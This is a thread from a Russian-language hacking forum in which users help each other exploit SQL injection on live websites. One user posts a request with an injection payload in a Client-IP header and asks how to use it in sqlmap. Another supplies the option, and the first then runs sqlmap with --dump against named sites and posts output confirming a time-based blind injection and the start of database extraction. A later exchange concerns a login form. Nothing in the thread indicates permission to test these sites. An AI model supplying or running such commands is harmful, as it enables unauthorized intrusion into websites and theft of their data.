HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #661  
Старый 28.05.2018, 01:19
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Первый раз подобный отчёт об SQL

Как прописать запрос в SQLmap ?

Код:
Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
 
Ответить с цитированием

  #662  
Старый 28.05.2018, 01:26
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?
Код:
Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
--headers='client-ip:*'
 
Ответить с цитированием

  #663  
Старый 28.05.2018, 01:41
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

--headers='client-ip:*'
Код:
Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent
Не прокатило
 
Ответить с цитированием

  #664  
Старый 28.05.2018, 01:43
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

--headers='client-ip:*'
Ноооооооооооо

Код:
Code:
sqlmap -u site.ru --headers="Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='" --dump --random-agent
Так что то пошло

Код:
Code:
[00:41:28] [INFO] (custom) HEADER parameter 'Client-IP #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
 
Ответить с цитированием

  #665  
Старый 28.05.2018, 01:53
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Код:
Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent
Не прокатило
возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
 
Ответить с цитированием

  #666  
Старый 28.05.2018, 01:58
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
Почти сдвиг есть в хорошую сторону

там кажись waf (

Ошибки есть пока что крутит BD

Код:
Code:
[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
arget testing? [y/N]
спасибо тебе, чётко помог.
 
Ответить с цитированием

  #667  
Старый 01.06.2018, 02:50
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

SQLmap не может спалить дыру

Код:
Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=%5c&password=g00dPa%24%24w0rD
я так понимаю всё и за %5c \с ней тоже дырка появляется

если убрать дырка исчезает

кто сталкивался ?
 
Ответить с цитированием

  #668  
Старый 01.06.2018, 04:08
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Может КФ не дает? мало данных подробней надо
 
Ответить с цитированием

  #669  
Старый 01.06.2018, 04:14
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Может КФ не дает? мало данных подробней надо
лс чекни
 
Ответить с цитированием

  #670  
Старый 01.06.2018, 18:51
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

SQLmap не может спалить дыру
Код:
Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=%5c&password=g00dPa%24%24w0rD
я так понимаю всё и за %5c
\
с ней тоже дырка появляется
если убрать дырка исчезает
кто сталкивался ?
Было не раз такое.

Похоже что это не скуля, а просто ошибка.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ